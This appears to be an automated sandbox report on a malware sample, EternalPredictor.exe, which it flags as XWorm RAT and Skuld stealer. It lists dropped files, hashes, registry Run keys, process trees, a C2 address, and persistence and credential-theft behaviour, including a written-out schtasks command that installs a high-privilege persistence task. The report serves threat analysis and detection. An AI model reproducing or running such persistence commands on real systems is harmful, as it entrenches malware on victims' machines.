Malware Analysis Report

2024-12-07 20:18

Sample ID 241117-l7p8jsxgjk
Target EternalPredictor.exe
SHA256 dc23f531b2e23535601968a1453a45565c9214264d4ef3d016c0a983ed720c30
Tags
skuld xworm persistence rat stealer trojan upx collection credential_access defense_evasion discovery execution privilege_escalation spyware
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

dc23f531b2e23535601968a1453a45565c9214264d4ef3d016c0a983ed720c30

Threat Level: Known bad

The file EternalPredictor.exe was found to be: Known bad.

Malicious Activity Summary

skuld xworm persistence rat stealer trojan upx collection credential_access defense_evasion discovery execution privilege_escalation spyware

Xworm

Skuld stealer

Xworm family

Detect Xworm Payload

Skuld family

Drops file in Drivers directory

Command and Scripting Interpreter: PowerShell

Loads dropped DLL

Clipboard Data

Unsecured Credentials: Credentials In Files

Reads user/profile data of web browsers

Executes dropped EXE

Drops startup file

Checks computer location settings

Accesses cryptocurrency files/wallets, possible credential harvesting

Legitimate hosting services abused for malware hosting/C2

Obfuscated Files or Information: Command Obfuscation

Looks up external IP address via web service

Adds Run key to start application

Enumerates processes with tasklist

UPX packed file

Enumerates physical storage devices

System Network Configuration Discovery: Wi-Fi Discovery

Browser Information Discovery

Event Triggered Execution: Netsh Helper DLL

Unsigned PE

Views/modifies file attributes

Uses Task Scheduler COM API

Scheduled Task/Job: Scheduled Task

Gathers system information

Detects videocard installed

Suspicious use of WriteProcessMemory

Suspicious use of SetWindowsHookEx

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-17 10:10

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-17 10:10

Reported

2024-11-17 10:13

Platform

win7-20240903-en

Max time kernel

132s

Max time network

131s

Command Line

"C:\Users\Admin\AppData\Local\Temp\EternalPredictor.exe"

Signatures

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Skuld family

skuld

Skuld stealer

stealer skuld

Xworm

trojan rat xworm

Xworm family

xworm

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk C:\Users\Admin\AppData\Roaming\eternal.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk C:\Users\Admin\AppData\Roaming\eternal.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Windows\CurrentVersion\Run\XClient = "C:\\Users\\Admin\\AppData\\Roaming\\XClient.exe" C:\Users\Admin\AppData\Roaming\eternal.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Enumerates physical storage devices

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\eternal.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\eternal.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\eternal.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\XClient.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\XClient.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\XClient.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\eternal.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1688 wrote to memory of 2896 N/A C:\Users\Admin\AppData\Local\Temp\EternalPredictor.exe C:\Users\Admin\AppData\Roaming\eternal.exe
PID 1688 wrote to memory of 2896 N/A C:\Users\Admin\AppData\Local\Temp\EternalPredictor.exe C:\Users\Admin\AppData\Roaming\eternal.exe
PID 1688 wrote to memory of 2896 N/A C:\Users\Admin\AppData\Local\Temp\EternalPredictor.exe C:\Users\Admin\AppData\Roaming\eternal.exe
PID 1688 wrote to memory of 2620 N/A C:\Users\Admin\AppData\Local\Temp\EternalPredictor.exe C:\Users\Admin\AppData\Roaming\skuld.exe
PID 1688 wrote to memory of 2620 N/A C:\Users\Admin\AppData\Local\Temp\EternalPredictor.exe C:\Users\Admin\AppData\Roaming\skuld.exe
PID 1688 wrote to memory of 2620 N/A C:\Users\Admin\AppData\Local\Temp\EternalPredictor.exe C:\Users\Admin\AppData\Roaming\skuld.exe
PID 1688 wrote to memory of 2764 N/A C:\Users\Admin\AppData\Local\Temp\EternalPredictor.exe C:\Users\Admin\AppData\Roaming\program.exe
PID 1688 wrote to memory of 2764 N/A C:\Users\Admin\AppData\Local\Temp\EternalPredictor.exe C:\Users\Admin\AppData\Roaming\program.exe
PID 1688 wrote to memory of 2764 N/A C:\Users\Admin\AppData\Local\Temp\EternalPredictor.exe C:\Users\Admin\AppData\Roaming\program.exe
PID 2764 wrote to memory of 2008 N/A C:\Users\Admin\AppData\Roaming\program.exe C:\Users\Admin\AppData\Roaming\program.exe
PID 2764 wrote to memory of 2008 N/A C:\Users\Admin\AppData\Roaming\program.exe C:\Users\Admin\AppData\Roaming\program.exe
PID 2764 wrote to memory of 2008 N/A C:\Users\Admin\AppData\Roaming\program.exe C:\Users\Admin\AppData\Roaming\program.exe
PID 2896 wrote to memory of 2568 N/A C:\Users\Admin\AppData\Roaming\eternal.exe C:\Windows\System32\schtasks.exe
PID 2896 wrote to memory of 2568 N/A C:\Users\Admin\AppData\Roaming\eternal.exe C:\Windows\System32\schtasks.exe
PID 2896 wrote to memory of 2568 N/A C:\Users\Admin\AppData\Roaming\eternal.exe C:\Windows\System32\schtasks.exe
PID 768 wrote to memory of 1368 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Roaming\XClient.exe
PID 768 wrote to memory of 1368 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Roaming\XClient.exe
PID 768 wrote to memory of 1368 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Roaming\XClient.exe
PID 768 wrote to memory of 1808 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Roaming\XClient.exe
PID 768 wrote to memory of 1808 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Roaming\XClient.exe
PID 768 wrote to memory of 1808 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Roaming\XClient.exe
PID 768 wrote to memory of 2756 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Roaming\XClient.exe
PID 768 wrote to memory of 2756 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Roaming\XClient.exe
PID 768 wrote to memory of 2756 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Roaming\XClient.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\EternalPredictor.exe

"C:\Users\Admin\AppData\Local\Temp\EternalPredictor.exe"

C:\Users\Admin\AppData\Roaming\eternal.exe

"C:\Users\Admin\AppData\Roaming\eternal.exe"

C:\Users\Admin\AppData\Roaming\skuld.exe

"C:\Users\Admin\AppData\Roaming\skuld.exe"

C:\Users\Admin\AppData\Roaming\program.exe

"C:\Users\Admin\AppData\Roaming\program.exe"

C:\Users\Admin\AppData\Roaming\program.exe

"C:\Users\Admin\AppData\Roaming\program.exe"

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "XClient" /tr "C:\Users\Admin\AppData\Roaming\XClient.exe"

C:\Windows\system32\taskeng.exe

taskeng.exe {0EE67685-4353-4E85-98F5-1A8131D337A5} S-1-5-21-3533259084-2542256011-65585152-1000:XPAJOTIY\Admin:Interactive:[1]

C:\Users\Admin\AppData\Roaming\XClient.exe

C:\Users\Admin\AppData\Roaming\XClient.exe

C:\Users\Admin\AppData\Roaming\XClient.exe

C:\Users\Admin\AppData\Roaming\XClient.exe

C:\Users\Admin\AppData\Roaming\XClient.exe

C:\Users\Admin\AppData\Roaming\XClient.exe

Network

Country Destination Domain Proto
US 147.185.221.23:33942 tcp
US 147.185.221.23:33942 tcp
US 147.185.221.23:33942 tcp
US 147.185.221.23:33942 tcp
US 147.185.221.23:33942 tcp

Files

memory/1688-0-0x000007FEF58A3000-0x000007FEF58A4000-memory.dmp

memory/1688-1-0x0000000000B10000-0x0000000001CA6000-memory.dmp

C:\Users\Admin\AppData\Roaming\eternal.exe

MD5 7439cc991a9a756c41153b8e9121baab
SHA1 c62528386e5f62ff2975cc8ed0cad3a7d362e632
SHA256 31a2b821e933bb193d94438d4a5aa036519535336c936d65b66889fb03164e2d
SHA512 cbdfd77671884407f8f4bd9c5251df5d8896b29bd004ea52460eda8a222df7492c69572e044376315624220f3ea66de3aff34323ea281591ca2975f90fa6dd51

memory/2896-7-0x0000000000100000-0x0000000000118000-memory.dmp

memory/2896-8-0x000007FEF58A0000-0x000007FEF628C000-memory.dmp

\Users\Admin\AppData\Roaming\skuld.exe

MD5 dbbd2127d1030e4c9548fdf7de9983a7
SHA1 5b7939a94cbd908ad8f57bb2e5328cce657c3700
SHA256 8e3601302c0294914808b6537cd27de961d087ba0807590b981b7f8c8aa5eee6
SHA512 95a1112c9b062745df9c20f566cfcb9421221111d02db0c1a940a5ea230b09c39a487685ae674c350e4641132e3360a19ca0cd8762f7e46cecde8b7dd85fe5d2

\Users\Admin\AppData\Roaming\program.exe

MD5 3e6865657b29faea3a355c710f0aad45
SHA1 ad9b98fa0f96685abc17aaab7fe4d65ac8fe34f7
SHA256 2c48f7bc874f1c812c0031519e756c28f940a58b2f64cdb40a08f1ccc798f671
SHA512 b360b5a244e83ee95719d7e781b9a49a29a5251e936619786b0151d0992aee33746109b3a8b0ab8d18c2788b738892c9b296c8c601025e16d850d730837b1615

C:\Users\Admin\AppData\Local\Temp\_MEI27642\python313.dll

MD5 6ef5d2f77064df6f2f47af7ee4d44f0f
SHA1 0003946454b107874aa31839d41edcda1c77b0af
SHA256 ab7c640f044d2eb7f4f0a4dfe5e719dfd9e5fcd769943233f5cece436870e367
SHA512 1662cc02635d63b8114b41d11ec30a2af4b0b60209196aac937c2a608588fee47c6e93163ea6bf958246c32759ac5c82a712ea3d690e796e2070ac0ff9104266

memory/2008-48-0x000007FEF23F0000-0x000007FEF2A53000-memory.dmp

memory/2896-53-0x000007FEF58A0000-0x000007FEF628C000-memory.dmp

memory/1368-59-0x0000000001370000-0x0000000001388000-memory.dmp

memory/2896-60-0x000007FEF58A0000-0x000007FEF628C000-memory.dmp

memory/2896-81-0x000007FEF58A0000-0x000007FEF628C000-memory.dmp

memory/1808-84-0x0000000000140000-0x0000000000158000-memory.dmp

memory/2756-86-0x0000000000DE0000-0x0000000000DF8000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-17 10:10

Reported

2024-11-17 10:13

Platform

win10v2004-20241007-en

Max time kernel

146s

Max time network

153s

Command Line

"C:\Users\Admin\AppData\Local\Temp\EternalPredictor.exe"

Signatures

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Xworm

trojan rat xworm

Xworm family

xworm

Drops file in Drivers directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Windows\system32\attrib.exe N/A
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Roaming\program.exe N/A
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Windows\system32\attrib.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\EternalPredictor.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Roaming\eternal.exe N/A

Clipboard Data

collection
Description Indicator Process Target
N/A N/A C:\Windows\system32\cmd.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk C:\Users\Admin\AppData\Roaming\eternal.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk C:\Users\Admin\AppData\Roaming\eternal.exe N/A

Reads user/profile data of web browsers

spyware stealer

Unsecured Credentials: Credentials In Files

credential_access stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\XClient = "C:\\Users\\Admin\\AppData\\Roaming\\XClient.exe" C:\Users\Admin\AppData\Roaming\eternal.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Realtek HD Audio Universal Service = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Protect\\SecurityHealthSystray.exe" C:\Users\Admin\AppData\Roaming\skuld.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A discord.com N/A N/A
N/A discord.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Obfuscated Files or Information: Command Obfuscation

defense_evasion

Enumerates processes with tasklist

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

Event Triggered Execution: Netsh Helper DLL

persistence privilege_escalation
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A

System Network Configuration Discovery: Wi-Fi Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\cmd.exe N/A

Detects videocard installed

Description Indicator Process Target
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Gathers system information

Description Indicator Process Target
N/A N/A C:\Windows\system32\systeminfo.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\eternal.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\eternal.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\skuld.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\eternal.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\XClient.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\eternal.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2736 wrote to memory of 4568 N/A C:\Users\Admin\AppData\Local\Temp\EternalPredictor.exe C:\Users\Admin\AppData\Roaming\eternal.exe
PID 2736 wrote to memory of 4568 N/A C:\Users\Admin\AppData\Local\Temp\EternalPredictor.exe C:\Users\Admin\AppData\Roaming\eternal.exe
PID 2736 wrote to memory of 4440 N/A C:\Users\Admin\AppData\Local\Temp\EternalPredictor.exe C:\Users\Admin\AppData\Roaming\skuld.exe
PID 2736 wrote to memory of 4440 N/A C:\Users\Admin\AppData\Local\Temp\EternalPredictor.exe C:\Users\Admin\AppData\Roaming\skuld.exe
PID 4440 wrote to memory of 1532 N/A C:\Users\Admin\AppData\Roaming\skuld.exe C:\Windows\system32\attrib.exe
PID 4440 wrote to memory of 1532 N/A C:\Users\Admin\AppData\Roaming\skuld.exe C:\Windows\system32\attrib.exe
PID 2736 wrote to memory of 3288 N/A C:\Users\Admin\AppData\Local\Temp\EternalPredictor.exe C:\Users\Admin\AppData\Roaming\program.exe
PID 2736 wrote to memory of 3288 N/A C:\Users\Admin\AppData\Local\Temp\EternalPredictor.exe C:\Users\Admin\AppData\Roaming\program.exe
PID 3288 wrote to memory of 4544 N/A C:\Users\Admin\AppData\Roaming\program.exe C:\Users\Admin\AppData\Roaming\program.exe
PID 3288 wrote to memory of 4544 N/A C:\Users\Admin\AppData\Roaming\program.exe C:\Users\Admin\AppData\Roaming\program.exe
PID 4568 wrote to memory of 5000 N/A C:\Users\Admin\AppData\Roaming\eternal.exe C:\Windows\system32\tree.com
PID 4568 wrote to memory of 5000 N/A C:\Users\Admin\AppData\Roaming\eternal.exe C:\Windows\system32\tree.com
PID 4544 wrote to memory of 4896 N/A C:\Users\Admin\AppData\Roaming\program.exe C:\Windows\system32\cmd.exe
PID 4544 wrote to memory of 4896 N/A C:\Users\Admin\AppData\Roaming\program.exe C:\Windows\system32\cmd.exe
PID 4544 wrote to memory of 1308 N/A C:\Users\Admin\AppData\Roaming\program.exe C:\Windows\system32\cmd.exe
PID 4544 wrote to memory of 1308 N/A C:\Users\Admin\AppData\Roaming\program.exe C:\Windows\system32\cmd.exe
PID 4544 wrote to memory of 4208 N/A C:\Users\Admin\AppData\Roaming\program.exe C:\Windows\system32\cmd.exe
PID 4544 wrote to memory of 4208 N/A C:\Users\Admin\AppData\Roaming\program.exe C:\Windows\system32\cmd.exe
PID 4896 wrote to memory of 2120 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4896 wrote to memory of 2120 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1308 wrote to memory of 4564 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1308 wrote to memory of 4564 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4208 wrote to memory of 1480 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Conhost.exe
PID 4208 wrote to memory of 1480 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Conhost.exe
PID 4544 wrote to memory of 4376 N/A C:\Users\Admin\AppData\Roaming\program.exe C:\Windows\system32\cmd.exe
PID 4544 wrote to memory of 4376 N/A C:\Users\Admin\AppData\Roaming\program.exe C:\Windows\system32\cmd.exe
PID 4544 wrote to memory of 4576 N/A C:\Users\Admin\AppData\Roaming\program.exe C:\Windows\system32\cmd.exe
PID 4544 wrote to memory of 4576 N/A C:\Users\Admin\AppData\Roaming\program.exe C:\Windows\system32\cmd.exe
PID 4376 wrote to memory of 4312 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 4376 wrote to memory of 4312 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 4576 wrote to memory of 4744 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 4576 wrote to memory of 4744 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 4544 wrote to memory of 2644 N/A C:\Users\Admin\AppData\Roaming\program.exe C:\Windows\system32\cmd.exe
PID 4544 wrote to memory of 2644 N/A C:\Users\Admin\AppData\Roaming\program.exe C:\Windows\system32\cmd.exe
PID 4544 wrote to memory of 4692 N/A C:\Users\Admin\AppData\Roaming\program.exe C:\Windows\system32\cmd.exe
PID 4544 wrote to memory of 4692 N/A C:\Users\Admin\AppData\Roaming\program.exe C:\Windows\system32\cmd.exe
PID 4544 wrote to memory of 2160 N/A C:\Users\Admin\AppData\Roaming\program.exe C:\Windows\system32\cmd.exe
